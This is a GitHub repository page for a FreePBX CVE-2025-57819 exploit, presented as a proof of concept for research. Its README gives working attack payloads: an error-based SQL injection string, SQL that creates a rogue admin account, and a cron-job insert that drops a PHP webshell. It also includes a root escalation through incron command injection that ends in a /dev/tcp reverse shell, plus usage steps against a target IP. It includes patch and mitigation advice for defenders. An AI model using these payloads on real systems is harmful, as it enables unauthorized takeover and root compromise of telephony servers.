Skip to content

JazzTheRabbit/FreePBX-SQLi-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
FreePBX-PoC.png
FreePBX-PoC.png
 
 
JTR-CVE-2025-57819.py
JTR-CVE-2025-57819.py
 
 
README.md
README.md
 
 

Repository files navigation

FreePBX CVE-2025-57819 - Unauthenticated SQLi to RCE PoC

Python License

Educational & Security Research Only - See Legal Notice Below

Exploitation proof of concept for CVE-2025-57819, a critical unauthenticated SQL injection vulnerability in FreePBX that allows remote code execution. This PoC is published after official patches were released for security research and authorized testing purposes only.

Overview

FreePBX versions 15.x, 16.x, and 17.x (below patched versions) are vulnerable to unauthenticated SQL injection in the endpoint module's AJAX handler. This vulnerability chain allows:

  1. Create administrative accounts via SQL injection
  2. Deploy webshells through authenticated cron job injection
  3. Escalate to root (if incron available) via sysadmin_manager hook chain
  4. Full system compromise with reverse shell access

Vulnerability Details
CVE ID CVE-2025-57819
Type Unauthenticated SQL Injection (Error-based)
CVSS 9.8 / 10.0 (Critical)
Affected FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3
Patched 15.0.66, 16.0.89, 17.0.3+
CISA KEV Yes (August 29, 2025)

Vulnerable Endpoint

GET /admin/ajax.php?brand=<PAYLOAD>

The brand parameter in the endpoint module's AJAX handler accepts user input without validation, leading to error-based SQL injection.

Exploitation Chain

Stage 1: SQL Injection & Admin Account Creation

Verify SQLi using EXTRACTVALUE() error-based extraction to leak the database name:

x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -

Insert new administrative user into asterisk.ampusers:

INSERT INTO ampusers (username, password_hash, admin) 
VALUES ('pbx_xxxxxxxx', '<MD5_HASH>', 1)

Stage 2: Authenticated Cron Job Injection

With valid admin credentials, the exploit authenticates to FreePBX and establishes an authenticated session. Session cookies are saved and used for all subsequent authenticated requests.

Inject webshell command into asterisk.cron_jobs:

INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', 'wx', 'echo <BASE64_WEBSHELL>|base64 -d >/var/www/html/shell.php', NULL, '* * * * *', 30, 1, 1)

FreePBX cron runner executes the command as asterisk user, dropping PHP webshell.

Stage 3: Webshell Activation

The PHP webshell is deployed to /var/www/html/shell.php:

<?php system($_GET['cmd']); ?>

Exploit polls the webshell until activation, achieving RCE as asterisk user (uid=999).

Stage 4: Privilege Escalation (Conditional)

If incron is configured on the target:

  1. Create trigger file in /var/spool/asterisk/incron/
  2. incrond (running as root) detects file creation
  3. Invokes /usr/bin/sysadmin_manager with the trigger filename
  4. sysadmin_manager validates GPG signature and dispatches to fwconsole-commands hook
  5. Hook decodes payload and executes: /usr/sbin/fwconsole <COMMAND>
  6. Command injection: help; bash -i >& /dev/tcp/LHOST/LPORT 0>&1

Result: Root shell on reverse listener (if incron available).

What It Abuses

  • No input validation on brand parameter
  • Stacked query execution allows database manipulation
  • Writable asterisk.cron_jobs table executes commands as asterisk
  • Authenticated session persistence via cookies from created admin account
  • Incron filesystem monitoring running as root
  • Unvalidated fwconsole hook execution with command injection

Installation

git clone https://github.com/JazzTheRabbit/cve-2025-57819.git
cd cve-2025-57819
pip3 install requests
chmod +x JTR-CVE-2025-57819.py

Usage

# Setup Netcat Listener
nc -lvnp <Listener Port>

# Run The Exploit
python3 JTR-CVE-2025-57819.py <TARGET_IP> <YOUR_IP> <PORT>

PoC

PoC Screenshot

Affected Versions

Version Status
15.0.0 - 15.0.65 Vulnerable
15.0.66+ Patched
16.0.0 - 16.0.88 Vulnerable
16.0.89+ Patched
17.0.0 - 17.0.2 Vulnerable
17.0.3+ Patched

Mitigation

Immediate:

  • Restrict /admin/ajax.php access from untrusted networks
  • Disable incron if not needed: systemctl disable incrond

Permanent: Upgrade to patched versions: 15.0.66+, 16.0.89+, or 17.0.3+

References

Legal Notice

⚠️ DISCLAIMER

This proof of concept is provided SOLELY FOR AUTHORIZED SECURITY TESTING AND EDUCATIONAL PURPOSES. The author assumes no liability for misuse or damage caused by this tool.

YOU MUST COMPLY WITH:

  • Computer Fraud and Abuse Act (CFAA) and equivalent laws in your jurisdiction
  • Only test systems you own or have explicit written authorization to test
  • Obtain written permission before any security testing
  • Responsible disclosure practices
  • Privacy and data protection regulations (GDPR, CCPA, etc.)

PROHIBITED USES:

  • Unauthorized access to computer systems
  • Penetration testing without written consent
  • Disruption of services or data theft
  • Any malicious or illegal activity

LIABILITY WAIVER: The author is not responsible for:

  • Unauthorized access or criminal charges
  • Damage to systems or data loss
  • Legal consequences of misuse
  • Violations of computer fraud laws

This vulnerability is:

  • Publicly disclosed (CVE-2025-57819)
  • Patches publicly available
  • Published for security research only
  • Shared responsibly after patch release

Author

JazzTheRabbit

License

MIT License

About

CVE-2025-57819 FreePBX SQLi RCE PoC

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages